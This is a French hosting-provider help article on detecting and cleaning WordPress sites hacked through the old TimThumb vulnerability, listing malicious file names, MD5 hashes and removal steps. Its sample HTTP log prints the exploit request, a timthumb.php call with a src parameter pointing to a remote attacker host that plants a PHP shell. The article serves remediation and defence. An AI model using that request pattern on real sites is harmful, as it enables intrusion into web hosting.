Piratage WordPress : TimThumb

TimThumb est un outil utilisé par les thèmes et plug-ins WordPress pour redimensionner des images. Les anciennes versions de TimThumb sont plus vulnérables en termes de sécurité, ce qui permet aux pirates de télécharger des fichiers malveillants (« bad files ») à partir d’un autre site Web. Le premier « bad file » permet alors au pirate de télécharger d’autres fichiers malveillants sur le compte d’hébergement.

Pour plus d’informations sur les piratages et l’attitude à adopter face à ces menaces, vous pouvez consulter Que faire si mon site Web est piraté ?.

Les signes que votre site a été piraté

Outre les signes mentionnés dans Que faire si mon site Web est piraté ?, vous saurez que votre site a été affecté par ce type spécifique de piratage si votre compte contient des fichiers qui se présentent comme suit dans un répertoire de plug-in :

  • external_[hash md5].php — par exemple : external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [hash md5].php — par exemple : 7eebe45bde5168488ac4010f0d65cea8.php

Pour des exemples de hashes md5 possibles, consultez la section Empreintes MD5SUM de fichiers malveillants connus de cet article.

Vous pourriez également trouver les fichiers suivants dans le répertoire racine de votre site Web (en savoir plus) :

  • x.txt
  • logx.txt

Solutions

Vous devez supprimer tous les fichiers piratés et les « bad files ». Avant de supprimer quoi que ce soit, nous vous conseillons d’effectuer une sauvegarde de votre site Web (en savoir plus).

Localiser les « bad files »

Les « bad files » initialement téléchargés par le biais de la vulnérabilité de TimThumb figurent généralement dans l’un des répertoires suivants, lesquels sont situés dans le répertoire /theme ou /plugin contenant le fichier TimThumb vulnérable.

  • /tmp
  • /cache
  • /images

Exemples d’emplacements possibles des « bad files » :

[webroot]/wp-content/themes/[thème contenant le fichier TimThumb vulnérable]/cache/images/

Exemples de noms de « bad files » dans ces répertoires :

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Les fichiers x.txt et logx.txt contiennent des informations sur le moment de création d’un « bad file » à l’aide de la vulnérabilité de TimThumb et sur l’emplacement de ce fichier malveillant dans le compte d’hébergement. Ces informations vous aideront à déterminer quels fichiers doivent être supprimés et où les trouver. Toutefois, il est peu probable que ces informations contiennent une liste complète des fichiers devant être supprimés.

Exemple :

Jour : Jeu, 11 avril 2013 06:21:15 -0700
IP : X.X.X.X
Navigateur : Mozilla/5.0 (Windows ; U ; Windows NT 5.1 ; en-US ; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url : /wp-content/themes/[thème contenant le fichier TimThumb vulnérable]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Fichiers à supprimer

Après avoir créé une sauvegarde de votre site, supprimez les fichiers suivants :

  • x.txt
  • logx.txt
  • external_[hash md5].php — par exemple : external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [hash md5].php — par exemple : 7eebe45bde5168488ac4010f0d65cea8.php
  • Les autres fichiers PHP malveillants trouvés avec les fichiers nommés par le hash md5.

Pour ce faire, utilisez FTP (en savoir plus) ou le gestionnaire de fichiers du panneau de configuration de votre compte d’hébergement (en savoir plus).

Nous vous recommandons également de prendre les précautions suivantes :

  • Mettre à jour tous vos thèmes et plug-ins vers la version la plus récente.
  • Remplacer toute instance de TimThumb.php par la version la plus récente, que vous pouvez trouver ici.

Informations techniques

Échantillon de logs HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[thème contenant le fichier TimThumb vulnérable]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[thème contenant le fichier TimThumb vulnérable]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[thème contenant le fichier TimThumb vulnérable]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[thème contenant le fichier TimThumb vulnérable]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Empreintes MD5SUM de fichiers malveillants connus

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Autres fichiers malveillants

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Cet article était-il utile ?
Nous vous remercions de votre feed-back. Pour parler avec un représentant de notre service clientèle, veuillez utiliser le numéro de téléphone du support technique ou l’option de chat présentée ci-dessus.
Nous sommes ravis de vous avoir aidé ! Y a-t-il autre chose que nous pouvons faire pour vous ?
Nous sommes désolés de ce problème. Dites-nous ce qui n’était pas clair ou pourquoi la solution n’a pas résolu votre problème.